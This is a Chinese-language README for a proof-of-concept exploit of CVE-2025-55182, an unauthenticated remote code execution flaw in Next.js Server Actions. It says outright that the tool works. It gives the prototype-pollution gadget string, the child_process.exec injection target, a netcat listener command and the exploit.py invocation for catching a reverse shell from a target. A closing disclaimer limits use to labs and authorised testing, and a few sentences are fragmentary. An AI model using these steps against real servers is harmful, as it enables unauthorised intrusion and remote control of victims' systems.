
我知道你可能是从 Hack the Box 过来的,如果是的话,没错,这个真的能用。
一个针对 CVE-2025-55182 的概念验证(PoC)漏洞利用程序,目标是 Next.js Server Actions 中的未认证远程代码执行(RCE)漏洞。
该漏洞利用程序滥用 React Server Components(RSC)multipart 负载反序列化过程中的原型污染,通过异步、非阻塞的执行流程将恶意命令注入 Node.js 进程。
child_process.exec() 而非阻塞式的 execSync() API,以防止容器节点上的线程挂起。requests 库构建。在攻击主机上打开终端,启动一个 netcat 套接字监听器以捕获传入的反向连接:
nc -lvnp 4444
提供目标基础 URL、本地主机接口 IP 以及所需的监听端口:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
该脚本直接向应用程序路由端点发送精心构造的原始 multipart 负载,并携带所需的 Next-Action 路由头。
通过利用 {"get":"$1:constructor:constructor"} 对象构造签名,反序列化引擎污染了原生对象树。在处理附带参数时,它将恶意嵌入的 _response 上下文块解释为指令队列,从而允许以运行中的 Node 服务器用户上下文的权限执行代码。
// 底层向量目标:
process.mainModule.require('child_process').exec('your_payload_here');
本脚本严格用于教育目的、授权安全测试以及在 Hack The Box 等实验室环境中捕获漏洞标志。作者不对任何滥用、未经授权的系统入侵或由该工具造成的损害负责。